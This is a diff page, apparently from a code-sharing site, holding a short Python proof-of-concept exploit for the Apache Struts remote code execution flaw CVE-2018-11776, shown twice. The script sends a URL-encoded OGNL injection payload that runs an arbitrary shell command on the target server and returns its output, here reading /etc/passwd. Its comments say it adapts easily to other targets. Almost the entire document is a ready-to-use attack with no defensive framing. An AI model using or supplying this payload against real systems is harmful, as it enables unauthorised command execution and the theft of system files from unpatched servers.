atucom · July 16, 2019 01:46
diff --git a/CVE-2018-11776-PoC.py b/CVE-2018-11776-PoC.py
 import requests
 # Simple PoC for the Apache Struts vuln CVE-2018-11776
 # this currently works on the struts showcase app but can easily be adapted to anything
 # Thanks to https://github.com/jas502n/St2-057 for working OGNL statements :D (proper URL encoding REALLY matters)
 # @atucom

 def runCMD(command):
    target = 'http://192.168.235.181:8080/struts3-showcase/'
    payload = '%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27' + command + '%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action'
    return requests.get(target + payload).text

 print(runCMD('cat /etc/passwd'))
	import requests
	# Simple PoC for the Apache Struts vuln CVE-2018-11776
	# this currently works on the struts showcase app but can easily be adapted to anything
	# Thanks to https://github.com/jas502n/St2-057 for working OGNL statements :D (proper URL encoding REALLY matters)
	# @atucom

	def runCMD(command):
	target = 'http://192.168.235.181:8080/struts3-showcase/'
	payload = '%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27' + command + '%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action'
	return requests.get(target + payload).text

	print(runCMD('cat /etc/passwd'))